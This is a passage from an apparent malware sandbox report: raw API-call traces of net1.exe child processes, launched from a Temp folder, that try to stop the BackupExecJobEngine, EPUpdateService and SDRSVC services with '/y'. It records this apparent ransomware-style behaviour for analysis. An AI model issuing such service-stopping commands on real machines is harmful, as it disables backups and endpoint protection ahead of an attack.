_String2="BACKUPEXECJOBENGINE") returned 10 [0116.880] _wcsicmp (_String1="alerter", _String2="BACKUPEXECJOBENGINE") returned -1 [0116.880] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECJOBENGINE") returned 12 [0116.880] NetServiceControl (in: servername=0x0, service="BACKUPEXECJOBENGINE", opcode=0x0, arg=0x0, bufptr=0x18fe6c | out: bufptr=0x18fe6c) returned 0x889 [0116.883] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0116.883] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0116.884] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0116.885] GetFileType (hFile=0x0) returned 0x0 [0116.885] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x483ef0 [0116.885] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x483ef0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nG", lpUsedDefaultChar=0x0) returned 30 [0116.885] WriteFile (in: hFile=0x0, lpBuffer=0x483ef0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x18fdac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18fdac, lpOverlapped=0x0) returned 0 [0116.885] LocalFree (hMem=0x483ef0) returned 0x0 [0116.885] GetFileType (hFile=0x0) returned 0x0 [0116.885] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x486198 [0116.885] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x486198, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nH", lpUsedDefaultChar=0x0) returned 2 [0116.885] WriteFile (in: hFile=0x0, lpBuffer=0x486198, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18fdac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18fdac, lpOverlapped=0x0) returned 0 [0116.885] LocalFree (hMem=0x486198) returned 0x0 [0116.885] _ultow (in: _Dest=0x889, _Radix=1637852 | out: _Dest=0x889) returned="2185" [0116.885] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0116.886] GetFileType (hFile=0x0) returned 0x0 [0116.886] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x486198 [0116.886] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x486198, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0116.886] WriteFile (in: hFile=0x0, lpBuffer=0x486198, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x18fdb8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18fdb8, lpOverlapped=0x0) returned 0 [0116.886] LocalFree (hMem=0x486198) returned 0x0 [0116.886] GetFileType (hFile=0x0) returned 0x0 [0116.886] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x486198 [0116.886] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x486198, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nH", lpUsedDefaultChar=0x0) returned 2 [0116.886] WriteFile (in: hFile=0x0, lpBuffer=0x486198, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18fdb8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18fdb8, lpOverlapped=0x0) returned 0 [0116.886] LocalFree (hMem=0x486198) returned 0x0 [0116.886] NetApiBufferFree (Buffer=0x481af8) returned 0x0 [0116.886] NetApiBufferFree (Buffer=0x481b10) returned 0x0 [0116.887] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecJobEngine /y" [0116.887] exit (_Code=2) Process: id = "208" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6b72e000" os_pid = "0xc6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0xf48" cmd_line = "C:\\Windows\\system32\\net1 stop EPUpdateService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 602 os_tid = 0xbbc [0116.664] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf8c4 | out: lpSystemTimeAsFileTime=0x2cf8c4*(dwLowDateTime=0x1948d150, dwHighDateTime=0x1d6f0d1)) [0116.665] GetCurrentProcessId () returned 0xc6c [0116.665] GetCurrentThreadId () returned 0xbbc [0116.665] GetTickCount () returned 0x1150770 [0116.665] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf8bc | out: lpPerformanceCount=0x2cf8bc*=23576553793) returned 1 [0116.665] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0116.665] __set_app_type (_Type=0x1) [0116.665] __p__fmode () returned 0x770331f4 [0116.665] __p__commode () returned 0x770331fc [0116.665] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0116.666] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0116.666] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.666] GetConsoleOutputCP () returned 0x1b5 [0116.666] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0116.666] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.670] sprintf_s (in: _DstBuf=0x2cf87c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0116.670] setlocale (category=0, locale=".437") returned="English_United States.437" [0116.672] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0116.672] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0116.672] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPUpdateService /y" [0116.672] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cf648, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0116.672] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x72) returned 0x6ff650 [0116.672] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0116.672] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cf84c | out: Buffer=0x2cf84c*=0x701af0) returned 0x0 [0116.672] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cf84c | out: Buffer=0x2cf84c*=0x701b08) returned 0x0 [0116.672] _fileno (_File=0x77032900) returned -2 [0116.673] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0116.673] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0116.673] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0116.673] _wcsicmp (_String1="config", _String2="stop") returned -16 [0116.673] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0116.673] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0116.673] _wcsicmp (_String1="file", _String2="stop") returned -13 [0116.673] _wcsicmp (_String1="files", _String2="stop") returned -13 [0116.673] _wcsicmp (_String1="group", _String2="stop") returned -12 [0116.673] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0116.673] _wcsicmp (_String1="help", _String2="stop") returned -11 [0116.673] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0116.673] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0116.673] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0116.673] _wcsicmp (_String1="session", _String2="stop") returned -15 [0116.673] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0116.673] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0116.673] _wcsicmp (_String1="share", _String2="stop") returned -12 [0116.673] _wcsicmp (_String1="start", _String2="stop") returned -14 [0116.673] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0116.673] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0116.673] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0116.673] _wcsicmp (_String1="accounts", _String2="EPUpdateService") returned -4 [0116.673] _wcsicmp (_String1="computer", _String2="EPUpdateService") returned -2 [0116.673] _wcsicmp (_String1="config", _String2="EPUpdateService") returned -2 [0116.673] _wcsicmp (_String1="continue", _String2="EPUpdateService") returned -2 [0116.673] _wcsicmp (_String1="cont", _String2="EPUpdateService") returned -2 [0116.673] _wcsicmp (_String1="file", _String2="EPUpdateService") returned 1 [0116.673] _wcsicmp (_String1="files", _String2="EPUpdateService") returned 1 [0116.673] _wcsicmp (_String1="group", _String2="EPUpdateService") returned 2 [0116.673] _wcsicmp (_String1="groups", _String2="EPUpdateService") returned 2 [0116.673] _wcsicmp (_String1="help", _String2="EPUpdateService") returned 3 [0116.673] _wcsicmp (_String1="helpmsg", _String2="EPUpdateService") returned 3 [0116.674] _wcsicmp (_String1="localgroup", _String2="EPUpdateService") returned 7 [0116.674] _wcsicmp (_String1="pause", _String2="EPUpdateService") returned 11 [0116.674] _wcsicmp (_String1="session", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="sessions", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="sess", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="share", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="start", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="stats", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="statistics", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="stop", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="time", _String2="EPUpdateService") returned 15 [0116.674] _wcsicmp (_String1="user", _String2="EPUpdateService") returned 16 [0116.674] _wcsicmp (_String1="users", _String2="EPUpdateService") returned 16 [0116.674] _wcsicmp (_String1="msg", _String2="EPUpdateService") returned 8 [0116.674] _wcsicmp (_String1="messenger", _String2="EPUpdateService") returned 8 [0116.674] _wcsicmp (_String1="receiver", _String2="EPUpdateService") returned 13 [0116.674] _wcsicmp (_String1="rcv", _String2="EPUpdateService") returned 13 [0116.674] _wcsicmp (_String1="netpopup", _String2="EPUpdateService") returned 9 [0116.674] _wcsicmp (_String1="redirector", _String2="EPUpdateService") returned 13 [0116.674] _wcsicmp (_String1="redir", _String2="EPUpdateService") returned 13 [0116.674] _wcsicmp (_String1="rdr", _String2="EPUpdateService") returned 13 [0116.674] _wcsicmp (_String1="workstation", _String2="EPUpdateService") returned 18 [0116.674] _wcsicmp (_String1="work", _String2="EPUpdateService") returned 18 [0116.674] _wcsicmp (_String1="wksta", _String2="EPUpdateService") returned 18 [0116.674] _wcsicmp (_String1="prdr", _String2="EPUpdateService") returned 11 [0116.674] _wcsicmp (_String1="devrdr", _String2="EPUpdateService") returned -1 [0116.674] _wcsicmp (_String1="lanmanworkstation", _String2="EPUpdateService") returned 7 [0116.674] _wcsicmp (_String1="server", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="svr", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="srv", _String2="EPUpdateService") returned 14 [0116.674] _wcsicmp (_String1="lanmanserver", _String2="EPUpdateService") returned 7 [0116.674] _wcsicmp (_String1="alerter", _String2="EPUpdateService") returned -4 [0116.675] _wcsicmp (_String1="netlogon", _String2="EPUpdateService") returned 9 [0116.675] _wcsupr (in: _String="EPUpdateService" | out: _String="EPUPDATESERVICE") returned="EPUPDATESERVICE" [0116.675] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x705448 [0116.855] GetServiceKeyNameW (in: hSCManager=0x705448, lpDisplayName="EPUPDATESERVICE", lpServiceName=0x39aaf0, lpcchBuffer=0x2cf7e8 | out: lpServiceName="", lpcchBuffer=0x2cf7e8) returned 0 [0116.855] _wcsicmp (_String1="msg", _String2="EPUPDATESERVICE") returned 8 [0116.856] _wcsicmp (_String1="messenger", _String2="EPUPDATESERVICE") returned 8 [0116.856] _wcsicmp (_String1="receiver", _String2="EPUPDATESERVICE") returned 13 [0116.856] _wcsicmp (_String1="rcv", _String2="EPUPDATESERVICE") returned 13 [0116.856] _wcsicmp (_String1="redirector", _String2="EPUPDATESERVICE") returned 13 [0116.856] _wcsicmp (_String1="redir", _String2="EPUPDATESERVICE") returned 13 [0116.856] _wcsicmp (_String1="rdr", _String2="EPUPDATESERVICE") returned 13 [0116.856] _wcsicmp (_String1="workstation", _String2="EPUPDATESERVICE") returned 18 [0116.856] _wcsicmp (_String1="work", _String2="EPUPDATESERVICE") returned 18 [0116.856] _wcsicmp (_String1="wksta", _String2="EPUPDATESERVICE") returned 18 [0116.856] _wcsicmp (_String1="prdr", _String2="EPUPDATESERVICE") returned 11 [0116.856] _wcsicmp (_String1="devrdr", _String2="EPUPDATESERVICE") returned -1 [0116.856] _wcsicmp (_String1="lanmanworkstation", _String2="EPUPDATESERVICE") returned 7 [0116.856] _wcsicmp (_String1="server", _String2="EPUPDATESERVICE") returned 14 [0116.856] _wcsicmp (_String1="svr", _String2="EPUPDATESERVICE") returned 14 [0116.856] _wcsicmp (_String1="srv", _String2="EPUPDATESERVICE") returned 14 [0116.856] _wcsicmp (_String1="lanmanserver", _String2="EPUPDATESERVICE") returned 7 [0116.856] _wcsicmp (_String1="alerter", _String2="EPUPDATESERVICE") returned -4 [0116.856] _wcsicmp (_String1="netlogon", _String2="EPUPDATESERVICE") returned 9 [0116.856] NetServiceControl (in: servername=0x0, service="EPUPDATESERVICE", opcode=0x0, arg=0x0, bufptr=0x2cf7e4 | out: bufptr=0x2cf7e4) returned 0x889 [0116.857] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0116.857] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0116.858] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0116.860] GetFileType (hFile=0x0) returned 0x0 [0116.860] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x703e60 [0116.860] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x703e60, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0116.860] WriteFile (in: hFile=0x0, lpBuffer=0x703e60, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2cf724, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf724, lpOverlapped=0x0) returned 0 [0116.860] LocalFree (hMem=0x703e60) returned 0x0 [0116.860] GetFileType (hFile=0x0) returned 0x0 [0116.860] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x706110 [0116.860] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x706110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0116.860] WriteFile (in: hFile=0x0, lpBuffer=0x706110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf724, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf724, lpOverlapped=0x0) returned 0 [0116.860] LocalFree (hMem=0x706110) returned 0x0 [0116.860] _ultow (in: _Dest=0x889, _Radix=2946900 | out: _Dest=0x889) returned="2185" [0116.860] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0116.860] GetFileType (hFile=0x0) returned 0x0 [0116.860] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x706110 [0116.860] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x706110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0116.860] WriteFile (in: hFile=0x0, lpBuffer=0x706110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2cf730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf730, lpOverlapped=0x0) returned 0 [0116.860] LocalFree (hMem=0x706110) returned 0x0 [0116.860] GetFileType (hFile=0x0) returned 0x0 [0116.861] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x706110 [0116.861] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x706110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0116.861] WriteFile (in: hFile=0x0, lpBuffer=0x706110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf730, lpOverlapped=0x0) returned 0 [0116.861] LocalFree (hMem=0x706110) returned 0x0 [0116.861] NetApiBufferFree (Buffer=0x701af0) returned 0x0 [0116.861] NetApiBufferFree (Buffer=0x701b08) returned 0x0 [0116.861] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPUpdateService /y" [0116.861] exit (_Code=2) Process: id = "209" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6c337000" os_pid = "0xc08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "85" os_parent_pid = "0xf0c" cmd_line = "C:\\Windows\\system32\\net1 stop SDRSVC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 603 os_tid = 0xcfc [0116.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fbac | out: lpSystemTimeAsFileTime=0x22fbac*(dwLowDateTime=0x194ff570, dwHighDateTime=0x1d6f0d1)) [0116.703] GetCurrentProcessId () returned 0xc08 [0116.703] GetCurrentThreadId () returned 0xcfc [0116.703] GetTickCount () returned 0x115079f [0116.703] QueryPerformanceCounter (in: lpPerformanceCount=0x22fba4 | out: lpPerformanceCount=0x22fba4*=23580438289) returned 1 [0116.704] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0116.704] __set_app_type (_Type=0x1) [0116.704] __p__fmode () returned 0x770331f4 [0116.704] __p__commode () returned 0x770331fc [0116.704] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0116.704] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0116.704] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.704] GetConsoleOutputCP () returned 0x1b5 [0116.705] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0116.705] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.708] sprintf_s (in: _DstBuf=0x22fb64, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0116.708] setlocale (category=0, locale=".437") returned="English_United States.437" [0116.711] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0116.711] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0116.711] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SDRSVC /y" [0116.711] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22f930, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0116.711] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x60) returned 0x253ac8 [0116.711] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0116.711] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x22fb34 | out: Buffer=0x22fb34*=0x251ad0) returned 0x0 [0116.711] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x22fb34 | out: Buffer=0x22fb34*=0x251ae8) returned 0x0 [0116.711] _fileno (_File=0x77032900) returned -2 [0116.711] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0116.711] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0116.711] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0116.711] _wcsicmp (_String1="config", _String2="stop") returned -16 [0116.711] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0116.711] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0116.711] _wcsicmp (_String1="file", _String2="stop") returned -13 [0116.711] _wcsicmp (_String1="files", _String2="stop") returned -13 [0116.711] _wcsicmp (_String1="group", _String2="stop") returned -12 [0116.711] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0116.711] _wcsicmp (_String1="help", _String2="stop") returned -11 [0116.712] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0116.712] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0116.712] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0116.712] _wcsicmp (_String1="session", _String2="stop") returned -15 [0116.712] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0116.712] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0116.712] _wcsicmp (_String1="share", _String2="stop") returned -12 [0116.712] _wcsicmp (_String1="start", _String2="stop") returned -14 [0116.712] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0116.712] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0116.712] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0116.712] _wcsicmp (_String1="accounts", _String2="SDRSVC") returned -18 [0116.712] _wcsicmp (_String1="computer", _String2="SDRSVC") returned -16 [0116.712] _wcsicmp (_String1="config", _String2="SDRSVC") returned -16 [0116.712] _wcsicmp (_String1="continue", _String2="SDRSVC") returned -16 [0116.712] _wcsicmp (_String1="cont", _String2="SDRSVC") returned -16 [0116.712] _wcsicmp (_String1="file", _String2="SDRSVC") returned -13 [0116.712] _wcsicmp (_String1="files", _String2="SDRSVC") returned -13 [0116.712] _wcsicmp (_String1="group", _String2="SDRSVC") returned -12 [0116.712] _wcsicmp (_String1="groups", _String2="SDRSVC") returned -12 [0116.712] _wcsicmp (_String1="help", _String2="SDRSVC") returned -11 [0116.712] _wcsicmp (_String1="helpmsg", _String2="SDRSVC") returned -11 [0116.712] _wcsicmp (_String1="localgroup", _String2="SDRSVC") returned -7 [0116.712] _wcsicmp (_String1="pause", _String2="SDRSVC") returned -3 [0116.712] _wcsicmp (_String1="session", _String2="SDRSVC") returned 1 [0116.712] _wcsicmp (_String1="sessions", _String2="SDRSVC") returned 1 [0116.712] _wcsicmp (_String1="sess", _String2="SDRSVC") returned 1 [0116.712] _wcsicmp (_String1="share", _String2="SDRSVC") returned 4 [0116.712] _wcsicmp (_String1="start", _String2="SDRSVC") returned 16 [0116.712] _wcsicmp (_String1="stats", _String2="SDRSVC") returned 16 [0116.712] _wcsicmp (_String1="statistics", _String2="SDRSVC") returned 16 [0116.712] _wcsicmp (_String1="stop", _String2="SDRSVC") returned 16 [0116.713] _wcsicmp (_String1="time", _String2="SDRSVC") returned 1 [0116.713] _wcsicmp (_String1="user", _String2="SDRSVC") returned 2 [0116.713] _wcsicmp (_String1="users", _String2="SDRSVC") returned 2 [0116.713] _wcsicmp (_String1="msg", _String2="SDRSVC") returned -6 [0116.713] _wcsicmp (_String1="messenger", _String2="SDRSVC") returned -6 [0116.713] _wcsicmp (_String1="receiver", _String2="SDRSVC") returned -1 [0116.713] _wcsicmp (_String1="rcv", _String2="SDRSVC") returned -1 [0116.713] _wcsicmp (_String1="netpopup", _String2="SDRSVC") returned -5 [0116.713] _wcsicmp (_String1="redirector", _String2="SDRSVC") returned -1 [0116.713] _wcsicmp (_String1="redir", _String2="SDRSVC") returned -1 [0116.713] _wcsicmp (_String1="rdr", _String2="SDRSVC") returned -1 [0116.713] _wcsicmp (_String1="workstation", _String2="SDRSVC") returned 4 [0116.713] _wcsicmp (_String1="work", _String2="SDRSVC") returned 4 [0116.713] _wcsicmp (_String1="wksta", _String2="SDRSVC") returned 4 [0116.713] _wcsicmp (_String1="prdr", _String2="SDRSVC") returned -3 [0116.713] _wcsicmp (_String1="devrdr", _String2="SDRSVC") returned -15 [0116.713] _wcsicmp (_String1="lanmanworkstation", _String2="SDRSVC") returned -7 [0116.713] _wcsicmp (_String1="server", _String2="SDRSVC") returned 1 [0116.713] _wcsicmp (_String1="svr", _String2="SDRSVC") returned 18 [0116.713] _wcsicmp (_String1="srv", _String2="SDRSVC") returned 14 [0116.713] _wcsicmp (_String1="lanmanserver", _String2="SDRSVC") returned -7 [0116.713] _wcsicmp (_String1="alerter", _String2="SDRSVC") returned -18 [0116.713] _wcsicmp (_String1="netlogon", _String2="SDRSVC") returned -5 [0116.713] _wcsupr (in: _String="SDRSVC" | out: _String="SDRSVC") returned="SDRSVC" [0116.713] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x255488 [0116.894] GetServiceKeyNameW (in: hSCManager=0x255488, lpDisplayName="SDRSVC", lpServiceName=0x39aaf0, lpcchBuffer=0x22fad0 | out: lpServiceName="", lpcchBuffer=0x22fad0) returned 0 [0116.894] _wcsicmp (_String1="msg", _String2="SDRSVC") returned -6 [0116.894] _wcsicmp (_String1="messenger", _String2="SDRSVC") returned -6 [0116.894] _wcsicmp (_String1="receiver", _String2="SDRSVC") returned -1 [0116.894] _wcsicmp (_String1="rcv", _String2="SDRSVC") returned -1 [0116.894] _wcsicmp (_String1="redirector", _String2="SDRSVC") returned -1 [0116.894] _wcsicmp (_String1="redir", _String2="SDRSVC") returned -1 [0116.894] _wcsicmp (_String1="rdr", _String2="SDRSVC") returned -1 [0116.894] _wcsicmp (_String1="workstation", _String2="SDRSVC") returned 4 [0116.895] _wcsicmp (_String1="work", _String2="SDRSVC") returned 4 [0116.895] _wcsicmp (_String1="wksta", _String2="SDRSVC") returned 4 [0116.895] _wcsicmp (_String1="prdr", _String2="SDRSVC") returned -3 [0116.895] _wcsicmp (_String1="devrdr", _String2="SDRSVC") returned -15 [0116.895] _wcsicmp (_String1="lanmanworkstation", _String2="SDRSVC") returned -7 [0116.895] _wcsicmp (_String1="server", _String2="SDRSVC") returned 1 [0116.895] _wcsicmp (_String1="svr", _String2="SDRSVC") returned 18 [0116.895] _wcsicmp (_String1="srv", _String2="SDRSVC") returned 14 [0116.895] _wcsicmp (_String1="lanmanserver", _String2="SDRSVC") returned -7 [0116.895] _wcsicmp (_String1="alerter", _String2="SDRSVC") returned -18 [0116.895] _wcsicmp (_String1="netlogon", _String2="SDRSVC") returned -5 [0116.895] NetServiceControl (in: servername=0x0, service="SDRSVC", opcode=0x0, 